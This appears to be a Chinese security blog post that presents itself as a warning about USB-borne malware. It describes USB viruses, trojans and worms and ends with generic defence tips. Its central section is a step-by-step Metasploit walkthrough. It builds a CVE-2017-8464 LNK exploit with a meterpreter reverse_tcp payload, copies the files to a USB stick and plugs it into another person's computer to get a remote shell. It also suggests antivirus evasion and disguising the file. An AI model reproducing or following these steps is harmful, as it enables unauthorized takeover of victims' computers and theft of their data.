X黑手网
X黑手网
X黑手网

U盘安全预警:警惕隐藏在U盘中的恶意软件

前言

在数字化时代,U盘成为了我们日常生活中不可或缺的存储设备之一。然而,正是因为其普遍性和便携性,U盘也成为了黑客们进行攻击的理想工具。通过利用各种技术手段,他们可以在U盘中隐藏恶意文件,或者直接从固件入手,在固件里植入恶意代码,从而获取用户的敏感信息或者破坏系统安全。这种攻击方式被称为“摆渡攻击”。下面将介绍两种常用的U盘攻击手段,希望大家能够了解相关技术,增强防范意识。

注意,以下教程仅供学习,请勿用于非法用途。

U盘攻击手段是指利用U盘进行的各种攻击手段,包括U盘病毒、U盘木马、U盘蠕虫等。U盘病毒是指感染U盘并通过U盘传播的恶意软件,它可以对计算机系统进行破坏、窃取数据、控制计算机等操作。U盘木马是指感染U盘并通过U盘自动执行恶意操作的程序,它可以隐藏在U盘中,等待用户插入U盘时自动运行。U盘蠕虫是指感染U盘并通过U盘传播的恶意程序,它可以自动复制自身到其他U盘或计算机中,不断扩散病毒。

以下是U盘攻击手段的常见类型及其特征:

  1. U盘病毒:

    • 特征:U盘病毒通常会感染U盘并通过U盘传播,它可以感染计算机系统的可执行文件、文档、压缩文件等,并对系统进行破坏、窃取数据、控制计算机等操作。
    • 常见类型:U盘病毒通常会被包装成可执行文件、脚本文件或压缩文件,并在U盘中传播。一旦用户插入感染了病毒的U盘,病毒就会自动执行,对计算机系统进行破坏。
  2. U盘木马:

    • 特征:U盘木马通常会感染U盘并通过U盘自动执行恶意操作,它可以隐藏在U盘中,等待用户插入U盘时自动运行。木马通常会尝试获取用户的密码、财务信息、个人数据等敏感信息,并将信息发送到攻击者的服务器上。
    • 常见类型:U盘木马通常会被包装成可执行文件、脚本文件或压缩文件,并在U盘中传播。一旦用户插入感染了木马的U盘,木马就会自动执行,并尝试获取用户的敏感信息。
  3. U盘蠕虫:

    • 特征:U盘蠕虫通常会感染U盘并通过U盘传播,它可以自动复制自身到其他U盘或计算机中,不断扩散病毒。蠕虫通常会尝试获取用户的密码、财务信息、个人数据等敏感信息,并将信息发送到攻击者的服务器上。
    • 常见类型:U盘蠕虫通常会被包装成可执行文件、脚本文件或压缩文件,并在U盘中传播。一旦用户插入感染了蠕虫的U盘,蠕虫就会自动复制自身到其他U盘或计算机中,并尝试获取用户的敏感信息。

U盘文件病毒

原理:在U盘里放入病毒文件,当用户浏览病毒文件时发起攻击。

准备工具:一台电脑、Kali Linux系统  一个U盘(最好是空的)

启动msfconsole

msfconsole

image

搜索漏洞模块

search CVE-2017-8464

image

使用漏洞攻击模块

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

image查看是否有需要填写的信息

查看是否有需要填写的信息

image

设置payload

set payload windows/meterpreter/reverse_tcp

image

填写LHOST,即攻击者机器的内网IP(一般都是本机的内网IP)

set lhost 192.168.X.XXX

image

运行攻击模块

exploit

image

在/root/.msf4/local/目录下会生成很多病毒文件(FlashPlayerCPLApp.cpl是主文件)

image

将以上所有文件都复制到U盘里(一般是根目录)

image

使用监听模块

use exploit/multi/handler

image

设置payload

set payload windows/meterpreter/reverse_tcp

image

填写LHOST(同上)

set lhost 192.168.X.XXX

image

运行监听模块

exploit

image

将U盘插入别人的电脑,点击FlashPlayerCPLApp.cpl文件后就可以获得目标电脑的控制权(如果对方电脑存在LNK漏洞的话,无需手动点击,只要浏览了FlashPlayerCPLApp.cpl所在文件夹就会自动运行病毒脚本)

image

可以通过shell直接操作对方的电脑

image

以上病毒文件都没有进行免杀,所以杀毒软件可以检测出来。如果进行了免杀并且修改了FlashPlayerCPLApp.cpl文件的文件名和图标等信息,完全可以达到深度伪装的效果

image

 

为了防止U盘攻击,用户应注意以下措施:

  1. 不要插入未知来源的U盘,尤其是从网络上下载的U盘文件。
  2. 定期对计算机进行安全扫描和病毒查杀,及时更新操作系统和应用程序的补丁,并安装防火墙和杀毒软件。
  3. 不要打开从未知来源的电子邮件附件或下载的可执行文件,特别是U盘木马和U盘病毒。
  4. 在使用U盘时,不要保存敏感数据,并定期格式化U盘,以防止U盘感染病毒和木马。
  5. 如果发现U盘中有可疑文件,应立即删除并重新格式化U盘,并检查计算机系统中是否存在可疑程序或进程。

总之,U盘攻击手段具有较高的隐蔽性和破坏性,用户应提高安全意识,采取适当的防范措施,以保护自己的计算机系统和个人数据免受U盘攻击的威胁。

U盘攻击手段的防范措施是针对U盘病毒、木马和蠕虫等恶意软件的预防措施,包括及时更新操作系统和应用程序,安装防火墙和杀毒软件,定期扫描和查杀病毒,避免插入未知来源的U盘文件等。这些措施可以有效地保护计算机系统和个人数据免受U盘攻击的侵害。

© 版权声明
THE END
喜欢就支持一下吧
点赞6赞赏 分享
评论 共1条

请登录后发表评论